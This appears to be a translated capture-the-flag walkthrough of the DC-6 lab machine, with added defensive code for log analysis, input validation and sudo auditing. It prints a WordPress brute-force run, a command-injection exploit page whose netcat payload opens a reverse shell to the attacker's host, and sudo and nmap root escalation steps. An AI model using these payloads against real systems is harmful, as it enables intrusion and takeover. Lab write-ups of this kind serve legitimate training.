Penetration Testing: DC_6
1. Host discovery and port scanning
root@kali:~/Desktop/valecalida's_Sript# python3 ARP_Scan.py -i eth0 10.87.51.0/24
[..] Making ARP scan...
IP: 10.87.51.2 MAC:00:50:56:ea:29:0e
IP: 10.87.51.1 MAC:00:50:56:c0:00:08
IP: 10.87.51.30 MAC:00:0c:29:b8:38:74
IP: 10.87.51.254 MAC:00:50:56:fe:7f:66
[+] Cost about 3.228038787841797 s
The host 10.87.51.30 found here is the target of this test.
root@kali:~# nmap -A 10.87.51.30
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 08:18 EDT
Nmap scan report for 10.87.51.30
Host is up (0.00084s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://wordy/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:B8:38:74 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The target host has port 22 open along with the common port 80, and the scan also shows this message: Did not follow redirect to http://wordy/. I figured the site cannot be reached directly by IP, so I added the following entry to /etc/hosts:
10.87.51.30 wordy
After that the page loads normally, and it is clearly a WordPress site.
2. Penetration testing process
Use whatweb to identify the version; wpscan can of course be used directly for this as well.
root@kali:~# whatweb 10.87.51.30
http://10.87.51.30 [301 Moved Permanently] Apache[2.4.25], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[10.87.51.30], RedirectLocation[http://wordy/], UncommonHeaders[x-redirect-by]
http://wordy/ [200 OK] Apache[2.4.25], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[10.87.51.30], JQuery[1.12.4], MetaGenerator[WordPress 5.1.1], PoweredBy[WordPress], Script[text/javascript], Title[Wordy – Just another WordPress site], UncommonHeaders[link], WordPress[5.1.1]
The WordPress version is 5.1.1. Next, wpscan is used for directory scanning; only the information I consider useful is included here.
root@kali:~# wpscan --url http://wordy
[+] Headers
| Interesting Entry: Server: Apache/2.4.25 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://wordy/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
Use aggressive plugin detection to take a closer look.
root@kali:~# wpscan --url http://wordy --plugins-detection aggressive
[+] akismet
| Location: http://wordy/wp-content/plugins/akismet/
| Latest Version: 4.1.5
| Last Updated: 2020-04-29T13:02:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://wordy/wp-content/plugins/akismet/, status: 403
|
| The version could not be determined.
[+] plainview-activity-monitor
| Location: http://wordy/wp-content/plugins/plainview-activity-monitor/
| Last Updated: 2018-08-26T15:08:00.000Z
| Readme: http://wordy/wp-content/plugins/plainview-activity-monitor/readme.txt
| [!] The version is out of date, the latest version is 20180826
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://wordy/wp-content/plugins/plainview-activity-monitor/, status: 200
|
| Version: 20161228 (50% confidence)
| Found By: Readme - ChangeLog Section (Aggressive Detection)
| - http://wordy/wp-content/plugins/plainview-activity-monitor/readme.txt
[+] user-role-editor
| Location: http://wordy/wp-content/plugins/user-role-editor/
| Last Updated: 2020-03-22T13:20:00.000Z
| Readme: http://wordy/wp-content/plugins/user-role-editor/readme.txt
| [!] The version is out of date, the latest version is 4.53.1
|
| Found By: Known Locations (Aggressive Detection)
| - http://wordy/wp-content/plugins/user-role-editor/, status: 200
|
| Version: 4.24 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://wordy/wp-content/plugins/user-role-editor/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==================> (21 / 21) 100.00% Time: 00:00:00
This detected two plugins, plainview-activity-monitor and user-role-editor; note them down for now. Then enumerate the users that may exist on the target host (some redundant output is omitted here) and save those users to a wordlist.
root@kali:~# wpscan --url http://wordy --enumerate u
[+] admin
[+] graham
[+] mark
[+] sarah
[+] jens
Five users were found. Next, use cewl to generate a password wordlist.
root@kali:~# cewl http://wordy -w pass.dic
root@kali:~# wc -l pass.dic
89 pass.dic
As shown, 89 password candidates were generated; now brute-force each of the accounts found earlier with them.
root@kali:~# wpscan --url http://wordy -U user.dic -P pass.dic
#Nothing cracked; switch wordlists, sob sob sob; going to use Kali's built-in rockyou.txt, though that may take a while
root@kali:~# wpscan --url http://wordy -U user.dic -P Desktop/rockyou.txt
[SUCCESS] - mark / helpdesk01
This yields mark / helpdesk01. I later found that there was a hint; I really did not read the challenge carefully....
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
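From the defender's side, the wpscan password attack above is visible in the web server log as a burst of POSTs to wp-login.php (and to xmlrpc.php, which wpscan reported as enabled) from a single client. The following is an added example, not code from the original post: it parses constructed Apache combined-format log lines and flags such bursts, treating a 302 on wp-login.php after a run of 200 responses as a probable successful login. The IPs, timestamps and User-Agent strings in the sample are constructed.

```python
import re
from collections import Counter, defaultdict

# Constructed Apache combined-log sample (not taken from the DC-6 box): one client
# hammers the login endpoints and finally gets a 302, the other logs in normally.
SAMPLE_LOG = """\
10.87.51.17 - - [30/Apr/2020:08:40:01 -0400] "GET /wp-login.php HTTP/1.1" 200 2731 "-" "WPScan v3.7.10"
10.87.51.17 - - [30/Apr/2020:08:40:02 -0400] "POST /wp-login.php HTTP/1.1" 200 3210 "-" "WPScan v3.7.10"
10.87.51.17 - - [30/Apr/2020:08:40:02 -0400] "POST /wp-login.php HTTP/1.1" 200 3210 "-" "WPScan v3.7.10"
10.87.51.17 - - [30/Apr/2020:08:40:03 -0400] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "WPScan v3.7.10"
10.87.51.17 - - [30/Apr/2020:08:40:03 -0400] "POST /wp-login.php HTTP/1.1" 200 3210 "-" "WPScan v3.7.10"
10.87.51.17 - - [30/Apr/2020:08:40:04 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "-" "WPScan v3.7.10"
10.87.51.2 - - [30/Apr/2020:08:41:10 -0400] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.87.51.2 - - [30/Apr/2020:08:41:15 -0400] "GET /wp-admin/ HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
LOGIN_ENDPOINTS = ("/wp-login.php", "/xmlrpc.php")

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_login_bursts(log_text, threshold=5):
    """Map client IP -> {attempts, succeeded, agents} for clients whose POSTs to the
    login endpoints reach the threshold. WordPress answers a correct password on
    wp-login.php with a 302 to wp-admin, so a 302 after a run of 200s marks a hit."""
    attempts, succeeded, agents = Counter(), defaultdict(bool), defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["method"] != "POST":
            continue
        path = rec["path"].split("?", 1)[0]
        if path not in LOGIN_ENDPOINTS:
            continue
        attempts[rec["ip"]] += 1
        agents[rec["ip"]].add(rec["ua"])
        if path == "/wp-login.php" and rec["status"] == "302":
            succeeded[rec["ip"]] = True
    return {ip: {"attempts": n, "succeeded": succeeded[ip], "agents": agents[ip]}
            for ip, n in attempts.items() if n >= threshold}

if __name__ == "__main__":
    for ip, info in find_login_bursts(SAMPLE_LOG).items():
        print(ip, info["attempts"], "login POSTs, success:", info["succeeded"], sorted(info["agents"]))
```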
Because the default WordPress admin login page is wp-login.php, visit it directly and log in with the credentials just obtained:
http://wordy/wp-login.php
Nothing useful was found after logging in, and logging in over SSH with the same credentials also failed, so I turned back to check whether the plugins had any vulnerabilities.
root@kali:~# searchsploit plainview activity monitor
Exploit Title | Path | (/usr/share/exploitdb/)
WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection | exploits/php/webapps/45274.html
Shellcodes: No Result
A command injection vulnerability is found here, though searchsploit lists no directly usable shellcode, so follow the hint and look further.
root@kali:~# searchsploit -m 45274.html
Exploit: WordPress Plugin Plainview Activity Monitor 20161228 - (Authenticated) Command Injection
URL: https://www.exploit-db.com/exploits/45274
Path: /usr/share/exploitdb/exploits/php/webapps/45274.html
File Type: HTML document, ASCII text, with CRLF line terminators
Copied to: /root/45274.html
Look at this file; only the important part is pasted here, the full code is at the end of the article.
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ip" value="google.fr| nc -nlvp 127.0.0.1 9999 -e /bin/bash" />
<input type="hidden" name="lookup" value="Lookup" />
<input type="submit" value="Submit request" />
Here we need to change a few things:
#localhost:8000 ——> wordy
#127.0.0.1 ——> 10.87.51.17
#remove -nlvp
Then open the modified file in a browser and click the button; the nc listener then shows that a connection has come in.
root@kali:~# nc -lvp 9999
listening on [any] 9999 ...
connect to [10.87.51.17] from wordy [10.87.51.30] 33976
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
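The root cause of the plugin bug above is a request parameter pasted into a shell command string (CWE-78). The following added example, not code from the original post or from the plugin, shows the vulnerable pattern beside its hardened form: strict validation of the lookup target as an IP address or RFC 1123 hostname, an argv list instead of a shell string, and shlex.quote for the case where a shell string is unavoidable. That the plugin performs a reverse lookup with dig is an assumption made for illustration; the payload string is the one from the walkthrough.

```python
import ipaddress
import re
import shlex

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens, no leading or
# trailing hyphen. Spaces, pipes, quotes and semicolons can never pass this.
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(r"^(?=.{1,253}$)(?:" + LABEL + r"\.)*" + LABEL + r"$")
SHELL_META = "|;&`$()<>\\\n\r'\""  # characters a request-side heuristic should flag

def classify_lookup_target(value):
    """Return 'ip', 'hostname' or None for anything that is not a plain address or name."""
    try:
        ipaddress.ip_address(value)
        return "ip"
    except ValueError:
        pass
    return "hostname" if HOSTNAME_RE.match(value) else None

def unsafe_lookup_command(value):
    """The vulnerable pattern: the request parameter is concatenated into a shell string
    (assumed 'dig -x'). Returned, never executed; a shell would run the part after '|'."""
    return "dig -x " + value

def quoted_lookup_command(value):
    """If a shell string is unavoidable, quoting makes the whole value a single word."""
    return "dig -x " + shlex.quote(value)

def safe_lookup_argv(value):
    """Hardened version: validate first, then build argv so no shell ever parses it."""
    kind = classify_lookup_target(value)
    if kind is None:
        raise ValueError("lookup target must be an IP address or a hostname")
    return ["dig", "+short", "-x", value] if kind == "ip" else ["dig", "+short", value]

def looks_injected(value):
    """Coarse WAF/IDS-style check for the 'ip' parameter: any shell metacharacter present."""
    return any(c in SHELL_META for c in value)

if __name__ == "__main__":
    for candidate in ("10.87.51.30", "google.fr", "google.fr| nc 10.87.51.17 9999 -e /bin/bash"):
        print(repr(candidate), "->", classify_lookup_target(candidate),
              "injected:", looks_injected(candidate))
```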
Improve the shell environment:
python -c 'import pty;pty.spawn("/bin/bash")'
Look at the user information under the home directory: there are four users.
www-data@dc-6:/home$ ls -l
ls -l
total 16
drwxr-xr-x 2 graham graham 4096 Apr 26 2019 graham
drwxr-xr-x 2 jens jens 4096 Apr 26 2019 jens
drwxr-xr-x 3 mark mark 4096 Apr 26 2019 mark
drwxr-xr-x 2 sarah sarah 4096 Apr 24 2019 sarah
Looking in the user directories turns up a backups.sh and a stuff directory; view the contents of each.
www-data@dc-6:/home$ ls jens graham mark sarah
ls jens graham mark sarah
graham:
jens:
backups.sh
mark:
stuff
sarah:
www-data@dc-6:/home/jens$ cat backups.sh
cat backups.sh
#!/bin/bash
tar -czf backups.tar.gz /var/www/html
www-data@dc-6:/home$ cd mark/stuff
cd mark/stuff
www-data@dc-6:/home/mark/stuff$ ls
ls
things-to-do.txt
www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt
cat things-to-do.txt
Things to do:
- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
This reveals a user, graham, with the password GSo7isUM1D4; log in with ssh.
C:\>ssh graham@10.87.51.30
graham@10.87.51.30's password:
Linux dc-6 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64
graham@dc-6:~$ id
uid=1001(graham) gid=1001(graham) groups=1001(graham),1005(devs)
The login works; test whether sudo is available.
graham@dc-6:~$ sudo -l
Matching Defaults entries for graham on dc-6:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User graham may run the following commands on dc-6:
(jens) NOPASSWD: /home/jens/backups.sh
This shows that /home/jens/backups.sh can be run as jens; append /bin/bash to the file:
#!/bin/bash
tar -czf backups.tar.gz /var/www/html
/bin/bash
Running it reports a permission error from tar, but the user has become jens.
graham@dc-6:~$ sudo -u jens /home/jens/backups.sh
tar: Removing leading `/' from member names
tar (child): backups.tar.gz: Cannot open: Permission denied
tar (child): Error is not recoverable: exiting now
tar: backups.tar.gz: Wrote only 4096 of 10240 bytes
tar: Child returned status 2
tar: Error is not recoverable: exiting now
jens@dc-6:/home/graham$
Test sudo again.
jens@dc-6:/home/graham$ sudo -l
Matching Defaults entries for jens on dc-6:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jens may run the following commands on dc-6:
(root) NOPASSWD: /usr/bin/nmap
This gives new information: user jens can run nmap as root.
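Both privilege escalation steps on this box come from sudo rules that an administrator could have caught in review: a NOPASSWD rule on a script that a non-owner can edit, and a NOPASSWD root rule on a binary (nmap) whose normal --script feature runs arbitrary code. The following is an added example, not code from the original post, of a small audit that parses sudo -l output and flags those two patterns. It builds a constructed stand-in for the box in a temporary directory; that backups.sh is group-writable is an assumption consistent with graham being able to edit it.

```python
import os
import re
import stat
import tempfile

# One "sudo -l" rule line looks like "(runas) NOPASSWD: /path/to/cmd [args]".
SUDO_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S.*)$")
# Programs whose ordinary features execute code (nmap --script here); root access to them is root.
SHELL_ESCAPE_BINARIES = {"nmap", "vi", "vim", "less", "more", "find", "awk", "perl", "python", "python3", "bash", "sh"}

def parse_sudo_l(text):
    """Extract runas user, NOPASSWD flag and command path from the rule lines of sudo -l."""
    rules = []
    for line in text.splitlines():
        m = SUDO_RULE_RE.match(line)
        if m:
            rules.append({"runas": m.group("runas"),
                          "nopasswd": "NOPASSWD:" in m.group("tags"),
                          "cmd": m.group("cmd").split()[0]})
    return rules

def audit_rule(rule):
    """Return the weaknesses a reviewer would flag for one rule."""
    findings, cmd = [], rule["cmd"]
    if rule["nopasswd"]:
        findings.append("NOPASSWD")
    if os.path.basename(cmd) in SHELL_ESCAPE_BINARIES:
        findings.append("shell-escape binary")
    try:
        mode = os.stat(cmd).st_mode
    except FileNotFoundError:
        findings.append("target missing")
        return findings
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("group/world writable")  # anyone in the group can change what runs
    return findings

def audit_sudo_output(text):
    return {r["cmd"]: audit_rule(r) for r in parse_sudo_l(text)}

def build_sample():
    """Constructed stand-in for the box: a group-writable backup script plus the nmap rule."""
    script = os.path.join(tempfile.mkdtemp(), "backups.sh")
    with open(script, "w") as f:
        f.write("#!/bin/bash\ntar -czf backups.tar.gz /var/www/html\n")
    os.chmod(script, 0o775)  # assumed devs-group-writable, as on the box
    sudo_l = ("User graham may run the following commands on dc-6:\n"
              f"    (jens) NOPASSWD: {script}\n"
              f"    (root) NOPASSWD: /usr/bin/nmap\n")
    return script, sudo_l
```

Run audit_sudo_output on the text from build_sample() (or on real sudo -l output) and every flagged rule lists its issues; an empty list means nothing in this checklist applies.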
jens@dc-6:/home/graham$ TF=$(mktemp)
jens@dc-6:/home/graham$ echo 'os.execute("/bin/sh")' > $TF
jens@dc-6:/home/graham$ sudo nmap --script=$TF
Starting Nmap 7.40 ( https://nmap.org ) at 2020-05-01 14:18 AEST
NSE: Warning: Loading '/tmp/tmp.gJqAfenpuY' -- the recommended file extension is '.nse'.
# uid=0(root) gid=0(root) groups=0(root)
# /bin/sh: 2: 菜刀/root: not found
# # theflag.txt
#
Yb dP 888888 88 88 8888b. dP"Yb 88b 88 888888 d8b
Yb db dP 88__ 88 88 8I Yb dP Yb 88Yb88 88__ Y8P
YbdPYbdP 88"" 88 .o 88 .o 8I dY Yb dP 88 Y88 88"" `"'
YP YP 888888 88ood8 88ood8 8888Y" YbodP 88 Y8 888888 (8)
Congratulations!!!
Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
The full content of the 45274 file is:
root@kali:~# cat 45274.html
<!--
About:
===========
Component: Plainview Activity Monitor (Wordpress plugin)
Vulnerable version: 20161228 and possibly prior
Fixed version: 20180826
CVE-ID: CVE-2018-15877
CWE-ID: CWE-78
Author:
- Lydéric Lefebvre (https://www.linkedin.com/in/lydericlefebvre)
Timeline:
===========
- 2018/08/25: Vulnerability found
- 2018/08/25: CVE-ID request
- 2018/08/26: Reported to developer
- 2018/08/26: Fixed version
- 2018/08/26: Advisory published on GitHub
- 2018/08/26: Advisory sent to bugtraq mailing list
Description:
===========
Plainview Activity Monitor Wordpress plugin is vulnerable to OS
command injection which allows an attacker to remotely execute
commands on underlying system. Application passes unsafe user supplied
data to ip parameter into activities_overview.php.
Privileges are required in order to exploit this vulnerability, but
this plugin version is also vulnerable to CSRF attack and Reflected
XSS. Combined, these three vulnerabilities can lead to Remote Command
Execution just with an admin click on a malicious link.
References:
===========
https://github.com/aas-n/CVE/blob/master/CVE-2018-15877/
PoC:
-->
<html>
<!-- Wordpress Plainview Activity Monitor RCE
[+] Version: 20161228 and possibly prior
[+] Description: Combine OS Commanding and CSRF to get reverse shell
[+] Author: Lydéric LEFEBVRE
[+] CVE-ID: CVE-2018-15877
[+] Usage: Replace 127.0.0.1 & 9999 with you ip and port to get reverse shell
[+] Note: Many reflected XSS exists on this plugin and can be combine with this exploit as well
-->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ip" value="google.fr| nc 10.87.51.17 9999 -e /bin/bash" />
<input type="hidden" name="lookup" value="Lookup" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Additions
https://diaryof0x41.wordpress.com/2019/05/29/vulnhub-dc-6-walkthrough/
https://www.hackingarticles.in/dc6-lab-walkthrough/